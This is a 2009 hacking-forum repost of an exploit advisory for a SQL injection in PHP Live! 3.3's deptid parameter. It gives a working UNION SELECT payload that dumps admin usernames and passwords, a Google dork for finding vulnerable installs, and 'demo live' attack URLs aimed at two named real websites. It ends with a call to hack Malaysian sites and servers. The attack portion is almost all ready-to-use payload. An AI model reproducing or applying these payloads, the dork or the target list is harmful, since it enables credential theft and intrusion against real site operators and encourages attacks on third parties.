SOLUTION & MATRIK
Silahkan Untuk Login Atau Register Terlebih Dahulu...
Terima Kasih..

Regards
Admin
SOLUTION & MATRIK
Silahkan Untuk Login Atau Register Terlebih Dahulu...
Terima Kasih..

Regards
Admin
SOLUTION & MATRIK
Would you like to react to this message? Create an account in a few clicks or log in to continue.


..::.. Sebuah Harapan Menuju Hidup Dalam Persahabatan ..::..
 
PortalHomeGallerySearchLatest imagesRegisterLog in

 

 PHP Live! 3.3 (deptid) Remote SQL Injection Vulnerability

Go down 
AuthorMessage
_vallent_
Super Admin
Super Admin
_vallent_


Posts : 126
Join date : 2009-09-03

PHP Live! 3.3 (deptid) Remote SQL Injection Vulnerability Empty
PostSubject: PHP Live! 3.3 (deptid) Remote SQL Injection Vulnerability   PHP Live! 3.3 (deptid) Remote SQL Injection Vulnerability I_icon_minitimeSat Sep 05, 2009 9:29 am

[o] PHP Live! 3.3 (deptid) Remote SQL Injection

--==[ Author ]==--
[+] Author : v3n0m
[+] Contact : v3n0m666[at]live[dot]com
[+] Blog : http://0wnage.wordpress.com/
[+] Group : YOGYACARDERLINK
[+] Site : http://yogyacarderlink.web.id/
[+] Date : September, 02-2009 [INDONESIA]
*************************************************************************
--==[ Details ]==--
[+] Software : PHP Live! Chat
[+] Version : v3.3
[+] Vendor : http://www.phplivesupport.com/
[+] Price : $49.95
[+] Vulnerable : Remote SQL Injection
[+] Google Dork : "Powered by PHP Live! v3.3"
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[-] Exploit:
[+] -999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin--

[-] Remote SQLi p0c:
[+] http://127.0.0.1/[path]/message_box.php?theme=&l=[username]&x=[xxx]&deptid=-999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin--
[xxx] = Valid x number

[-] Demo Live:
[+] http://www.edunet-help.com/message_box.php?theme=&l=sekolahmy&x=1&deptid=-999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin--

[+] https://www.guestcentric.com/support/message_box.php?theme=&l=guestcentric_wb&x=1&deptid=-999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin--


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

* Fuck to Malaysia <= the truly thief asia
be carefull your culture art & song,island get stolen and claimed by them
letz we hack they sites & servers !! PROUD TO BE INDONESIAN !!
* 11:20pm in my bedroom, preparing office goes on...!!

# milw0rm.com [2009-09-02]

Find this bug too on : http://www.milw0rm.com/exploits/9578
Back to top Go down
 
PHP Live! 3.3 (deptid) Remote SQL Injection Vulnerability
Back to top 
Page 1 of 1
 Similar topics
-
» Implementasi SQL injection pada joomla [ tutorial hacking ]

Permissions in this forum:You cannot reply to topics in this forum
SOLUTION & MATRIK :: T U T O R I A L :: Hacking-
Jump to: